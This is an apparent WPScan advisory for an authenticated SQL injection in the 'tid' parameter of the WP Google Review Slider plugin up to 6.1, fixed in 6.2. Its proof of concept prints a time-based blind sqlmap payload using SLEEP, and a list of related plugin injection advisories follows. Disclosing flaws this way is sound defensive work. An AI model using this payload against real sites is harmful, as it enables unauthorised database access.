WP Google Review Slider <= 6.1 – Authenticated SQL Injection | Plugin Vulnerabilities

Description

tid parameter vulnerable to SQLi.

Note (WPScanTeam): v6.1 has been pathed directly in the tags (https://plugins.trac.wordpress.org/browser/wp-google-places-review-slider/tags/6.1/admin/partials/templates_posts.php#L58). However the the issue can be verified with v6.0)

Proof of Concept

sqlmap identified the following injection point(s) with a total of 
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

Affects Plugins

wp-google-places-review-slider

Fixed in 6.2

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Original Researcher

Princy Edward

Submitter

Princy Edward

Verified

Yes

WPVDB ID

a12fe67d-2359-43a4-991c-cbe11bada7d8

Timeline

Publicly Published

2019-10-31 (about 6 years ago)

Added

2019-10-31 (about 6 years ago)

Last Updated

2019-12-23 (about 6 years ago)

Other

Published

Title

Published

2024-09-25

Title

Automation By Autonami < 3.2.0 - Authenticated (Administrator+) SQL Injection

Published

2023-10-30

Title

Information Reel < 10.1 - Authenticated (Subscriber+) SQL Injection via Shortcode

Published

2021-07-15

Title

WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection

Published

2024-04-25

Title

XStore Core < 5.3.9 - Unauthenticated SQL Injection

Published

2025-05-16

Title

Sticky HTML5 Music Player <= 3.1.6 - Authenticated (Contributor+) SQL Injection